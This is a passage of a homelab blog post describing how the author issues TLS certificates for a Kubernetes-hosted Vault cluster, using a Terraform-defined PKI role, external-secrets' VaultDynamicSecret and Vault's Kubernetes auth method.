</span></span><span style="display:flex;"><span>  backend <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_mount</span>.<span style="color:#66d9ef">my</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">ca</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">mount</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  common_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;My Private Root CA&#34;</span>
</span></span><span style="display:flex;"><span>  ttl <span style="color:#f92672">=</span> <span style="color:#ae81ff">157680000</span>
</span></span><span style="display:flex;"><span>  format <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;pem&#34;</span>
</span></span><span style="display:flex;"><span>  private_key_format <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;der&#34;</span>
</span></span><span style="display:flex;"><span>  key_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;rsa&#34;</span>
</span></span><span style="display:flex;"><span>  key_bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>  exclude_cn_from_sans <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  ou <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Private&#34;</span>
</span></span><span style="display:flex;"><span>  organization <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Private&#34;</span>
</span></span><span style="display:flex;"><span>  country <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;DE&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_pki_secret_backend_config_urls&#34; &#34;my-root-urls&#34;</span> {
</span></span><span style="display:flex;"><span>  backend <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_mount</span>.<span style="color:#66d9ef">my</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">ca</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">mount</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  issuing_certificates <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;https://vault.example.com/v1/my-ca/ca&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_pki_secret_backend_role&#34; &#34;vault-certs&#34;</span> {
</span></span><span style="display:flex;"><span>  backend <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_mount</span>.<span style="color:#66d9ef">my</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">ca</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">mount</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vault-certs&#34;</span>
</span></span><span style="display:flex;"><span>  ttl <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;15552000&#34;</span>
</span></span><span style="display:flex;"><span>  max_ttl <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;15552000&#34;</span>
</span></span><span style="display:flex;"><span>  allow_localhost <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  allowed_domains <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;newvault.example.com&#34;, &#34;vault-internal&#34;, &#34;127.0.0.1&#34;</span> ]
</span></span><span style="display:flex;"><span>  allow_subdomains <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  allow_ip_sans <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  allow_wildcard_certificates <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  allow_bare_domains <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  key_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;rsa&#34;</span>
</span></span><span style="display:flex;"><span>  key_bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>  organization <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;My Homelab&#34;</span>]
</span></span><span style="display:flex;"><span>  country <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;DE&#34;</span>]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>There&rsquo;s also another role for certs deployed for other purposes, but that&rsquo;s not
important here. I will not go over the base CA and mount configuration and
instead concentrate on the <code>vault-certs</code> role.</p>
<p>This role allows creating certificates for the <code>vault-internal</code> domain, covering
the three Pod&rsquo;s internal DNS names, the externally visible address of the Vault
cluster that the LoadBalancer points to at <code>newvault.example.com</code> and the
localhost address. The localhost IP is there because that&rsquo;s how the <code>vault</code> CLI
launched inside the Pods contacts the local Vault instance. That use case is
required for initialization and unsealing later.</p>
<p>This is the beauty of Terraform at work again. I could of course also do the
same using the Vault CLI, but then I would need to document the commands somewhere
and remember to update that documentation whenever something changes. With the
Infrastructure as code approach, I would make any changes in this definition,
so it&rsquo;s always up-to-date.</p>
<p>After a <code>terraform apply</code>, I could produce a certificate with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault write -format<span style="color:#f92672">=</span>json my-ca/issue/vault-certs common_name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;newvault.example.com&#34;</span> alt_names<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;vault-0.vault-internal,vault-1.vault-internal,vault-2.vault-internal&#34;</span> ttl<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;4000h&#34;</span> &gt; test.cert
</span></span></code></pre></div><p>The JSON file that produces looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;request_id&#34;</span>: <span style="color:#e6db74">&#34;5d72d050-8f80-ba4f-1067-b4165cf2d0f5&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;lease_id&#34;</span>: <span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;lease_duration&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;renewable&#34;</span>: <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;data&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ca_chain&#34;</span>: [
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n[...]\n-----END CERTIFICATE-----&#34;</span>
</span></span><span style="display:flex;"><span>    ],
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;certificate&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n [...] \n-----END CERTIFICATE-----&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;expiration&#34;</span>: <span style="color:#ae81ff">1757892246</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;issuing_ca&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n [...] \n-----END CERTIFICATE-----&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;private_key&#34;</span>: <span style="color:#e6db74">&#34;-----BEGIN RSA PRIVATE KEY-----\n[...]\n-----END RSA PRIVATE KEY-----&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;private_key_type&#34;</span>: <span style="color:#e6db74">&#34;rsa&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;serial_number&#34;</span>: <span style="color:#e6db74">&#34;7d:fe:7e:97:c1:56:96:eb:3d:27:e8:ee:48:78:82:bd:ca:f8:0d:7e&#34;</span>
</span></span><span style="display:flex;"><span>  },
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;mount_type&#34;</span>: <span style="color:#e6db74">&#34;pki&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>And I then revoked this test cert using the <code>serial_number</code> with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault write my-ca/revoke serial_number<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;7d:fe:7e:97:c1:56:96:eb:3d:27:e8:ee:48:78:82:bd:ca:f8:0d:7e&#34;</span>
</span></span></code></pre></div><h3 id="getting-the-certificate-into-kubernetes">Getting the certificate into Kubernetes</h3>
<p>I could then of course just upload the key and certificate into a k8s Secret,
but that just doesn&rsquo;t feel very Kubernetes-y, plus it would be a step I would
need to document for future renewals. Instead, I had another look at external-secrets
and found the <a href="https://external-secrets.io/latest/api/generator/vault/">VaultDynamicSecret</a>.</p>
<p>This is another nice feature for getting Vault outputs into k8s Secrets, only
this time it&rsquo;s not static credentials, but a certificate, complete with automatic
renewal. And the usage of the PKI secrets engine is even the example used in the
docs.</p>
<p>I initially deployed a manifest that looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">generators.external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">VaultDynamicSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-certs-generator&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;my-ca/issue/vault-certs&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#e6db74">&#34;POST&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">common_name</span>: <span style="color:#e6db74">&#34;newvault.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">alt_names</span>: <span style="color:#e6db74">&#34;vault-0.vault-internal,vault-1.vault-internal,vault-2.vault-internal&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ip_sans</span>: <span style="color:#e6db74">&#34;127.0.0.1&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resultType</span>: <span style="color:#e6db74">&#34;Data&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#e6db74">&#34;https://vault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-ca-cert</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">caCert</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">appRole</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;approle&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">roleId</span>: {{ <span style="color:#ae81ff">.Values.approleId }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;external-secrets-approle&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;secretId&#34;</span>
</span></span></code></pre></div><p>I deployed this manifest in the external-secret&rsquo;s namespace, because that was
where the <a href="https://developer.hashicorp.com/vault/docs/auth/approle">AppRole</a>
auth secrets lived.</p>
<p>Then I created the following ExternalSecret in the <code>vault</code> namespace to generate
a certificate:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-tls-certs&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;4000h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vault-tls-certs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">sourceRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">generatorRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">generators.external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">VaultDynamicSecret</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-certs-generator&#34;</span>
</span></span></code></pre></div><p>This didn&rsquo;t work, and I got an error about the <code>vault-certs-generator</code> not
being found. This was because the non-Cluster variants of external-secrets
objects are generally only available in the namespace where they were created.
So my ExternalSecret in the <code>vault</code> namespace wasn&rsquo;t able to access the
VaultDynamicSecret in the external-secrets namespace.</p>
<p>So I ended up moving the ExternalSecret into the external-secrets namespace
as well, just to make sure that it even works. That introduced me to an
authorization error looking something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;error&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#ae81ff">1742423406.4829333</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Reconciler error&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;controller&#34;</span>:<span style="color:#e6db74">&#34;externalsecret&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;controllerGroup&#34;</span>:<span style="color:#e6db74">&#34;external-secrets.io&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;controllerKind&#34;</span>:<span style="color:#e6db74">&#34;ExternalSecret&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;ExternalSecret&#34;</span>:{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;name&#34;</span>:<span style="color:#e6db74">&#34;vault-tls-certs&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;namespace&#34;</span>:<span style="color:#e6db74">&#34;external-secrets&#34;</span>
</span></span><span style="display:flex;"><span>},
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;namespace&#34;</span>:<span style="color:#e6db74">&#34;external-secrets&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;name&#34;</span>:<span style="color:#e6db74">&#34;vault-tls-certs&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;reconcileID&#34;</span>:<span style="color:#e6db74">&#34;d6b0b369-f959-479a-8228-f9a8d6fbc5bd&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;error&#34;</span>:<span style="color:#e6db74">&#34;error processing spec.dataFrom[0].sourceRef.generatorRef,
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">err: error using generator: Error making API request.\n\nURL:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">PUT https://vault.example.com:8200/v1/my-ca/issue/vault-certs
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">Code: 403. Errors:\n\n* 1 error occurred:\n\t* permission denied\n\n&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;stacktrace&#34;</span>:<span style="color:#e6db74">&#34;...&#34;</span>}
</span></span></code></pre></div><p>This was due to a mistake I had made in updating the policy for external-secrets
to allow it access to the <code>my-ca/issue/vault-certs</code> endpoint. The policy addition
I had made for that particular path looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;my-ca/issue/vault-certs&#34;</span> {
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;create&#34;</span> ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>That&rsquo;s what all the examples I could find said. But it did not work. I finally
added all permissions and then slowly removed the capabilities one by one,
until I arrived at only the <code>update</code> capability missing from the above.</p>
<p>After fixing that I finally got a certificate created. But I still had to do
something about the fact that the ExternalSecret lived in the external-secrets
namespace now, while it was needed in Vault&rsquo;s namespace.</p>
<p>One option I looked at to resolve this issue is <a href="https://external-secrets.io/latest/api/generator/cluster/">ClusterGenerators</a>.
These work similar to namespaced generators like VaultDynamicSecret, but allow
usage in ExternalSecrets throughout the cluster.
I ended up deciding against that, for simple &ldquo;doing things properly&rdquo; reasons:
The generator will only ever be needed in the Vault namespace, because it is not
a generic generator for TLS certs, but a specific generator restricted to creating
certs for Vault.</p>
<p>So I decided to stay with the namespaced VaultDynamicSecret, but change the
auth method to Kubernetes.</p>
<h3 id="setting-up-kubernetes-auth">Setting up Kubernetes auth</h3>
<p>Being the Swiss army knife that it is, Vault can also authenticate with
<a href="https://developer.hashicorp.com/vault/docs/auth/kubernetes">Kubernetes</a>.
The way this works is that you can create a role in Vault and assign policies
defining what that role can do. Then, certain Kubernetes ServiceAccounts can be
allowed to authenticate with that role. Vault then expects to receive a Kubernetes
JWT token to verify the authentication, which it then contacts Kubernetes for
to ensure the token is valid and belongs to one of the ServiceAccounts allowed
to use the Vault role.</p>
<p>One problem is that the action of verifying Kubernetes tokens itself also needs
a Kubernetes token for the API server access. With a Vault deployed via the
Helm chart that&rsquo;s easy, the <code>vault</code> ServiceAccount created by the chart already
has the necessary permissions, and Vault can use that account&rsquo;s token.
Vault will also automatically reload the token periodically, as Kubernetes
tokens are generally short-lived.</p>
<p>But at least initially, I need to use my baremetal Vault for the certificate
generation, because those are the certs that the k8s Vault deployment will use
later. To work around this issue, one could still use long-lived tokens. But
another way would be to use the JWT of the process that&rsquo;s trying to use the
Vault auth method. This requires some changes in Kubernetes though. Namely, the
ServiceAccounts which should validate to Vault via Kubernetes auth need to have
the <code>system:auth-delegator</code> ClusterRole. This allows the ServiceAccount&rsquo;s token
to be used by other apps (here, Vault) to authenticate with that token. Vault
can use this to access the <a href="https://kubernetes.io/docs/reference/kubernetes-api/authentication-resources/token-review-v1/">TokenReview</a>
API to verify that the token is valid.
No change is necessary here, because the <code>vault</code> ServiceAccount I will be using
already has the <code>auth-delegator</code> role.</p>
<p>So with that out of the way, here is the Vault Kubernetes auth setup:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_auth_backend&#34; &#34;kubernetes&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;kubernetes&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_kubernetes_auth_backend_config&#34; &#34;kube-backend-config&#34;</span> {
</span></span><span style="display:flex;"><span>  backend                <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_auth_backend</span>.<span style="color:#66d9ef">kubernetes</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  kubernetes_host        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://k8s.exmaple.com:6443&#34;</span>
</span></span><span style="display:flex;"><span>  issuer                 <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;api&#34;</span>
</span></span><span style="display:flex;"><span>  disable_iss_validation <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  kubernetes_ca_cert               <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;-----BEGIN CERTIFICATE-----\n [...]&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_kubernetes_auth_backend_role&#34; &#34;vault-certs&#34;</span> {
</span></span><span style="display:flex;"><span>  backend                          <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_auth_backend</span>.<span style="color:#66d9ef">kubernetes</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  role_name                        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vault-certs&#34;</span>
</span></span><span style="display:flex;"><span>  bound_service_account_names      <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;vault&#34;</span>]
</span></span><span style="display:flex;"><span>  bound_service_account_namespaces <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;vault&#34;</span>]
</span></span><span style="display:flex;"><span>  token_ttl                        <span style="color:#f92672">=</span> <span style="color:#ae81ff">3600</span>
</span></span><span style="display:flex;"><span>  token_policies                   <span style="color:#f92672">=</span> [<span style="color:#66d9ef">vault_policy</span>.<span style="color:#66d9ef">vault</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">certs</span>.<span style="color:#66d9ef">name</span>]
</span></span><span style="display:flex;"><span>  token_bound_cidrs                <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;300.300.300.0/24&#34;</span>]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>In this setup, the Kubernetes auth is created for the k8s API at <code>k8s.example.com:6443</code>.
The general k8s info can be found via this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl cluster-info
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Kubernetes control plane is running at https://k8s.example.com:6443
</span></span><span style="display:flex;"><span>CoreDNS is running at https://k8s.example.com:6443/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>To further debug and diagnose cluster problems, use <span style="color:#e6db74">&#39;kubectl cluster-info dump&#39;</span>.
</span></span></code></pre></div><p>To get the <code>kubernetes_ca_cert</code>, you can have a look at the <code>kube-root-ca.crt</code>
ConfigMap that should be available in all namespaces, for example like this:</p>
<pre tabindex="0"><code>kubectl get -n kube-system configmaps kube-root-ca.crt -o jsonpath=&#34;{[&#39;data&#39;][&#39;ca\.crt&#39;]}&#34;
</code></pre><p>Finally, I&rsquo;Ve also restricted all tokens created by the <code>vault-certs</code> role so
that they&rsquo;re only valid coming from IPs in the Homelab. That&rsquo;s just a small
defense in depth method I like to apply for any tokens in Vault where it&rsquo;s possible.</p>
<h3 id="finally-setting-up-the-certificate-generator">Finally setting up the certificate generator</h3>
<p>With the authentication now configured properly, the certificate generation
can be set up like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-tls-certs&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;4000h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vault-tls-certs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">sourceRef</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">generatorRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">generators.external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">VaultDynamicSecret</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-certs-generator&#34;</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">generators.external-secrets.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">VaultDynamicSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;vault-certs-generator&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;my-ca/issue/vault-certs&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#e6db74">&#34;POST&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">common_name</span>: <span style="color:#e6db74">&#34;newvault.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">alt_names</span>: <span style="color:#e6db74">&#34;vault-0.vault-internal,vault-1.vault-internal,vault-2.vault-internal&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ip_sans</span>: <span style="color:#e6db74">&#34;127.0.0.1&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resultType</span>: <span style="color:#e6db74">&#34;Data&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#e6db74">&#34;https://vault.example.com:8200&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-ca-cert</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">vault</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">caCert</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mountPath</span>: <span style="color:#e6db74">&#34;kubernetes&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">role</span>: <span style="color:#e6db74">&#34;vault-certs&#34;</span>
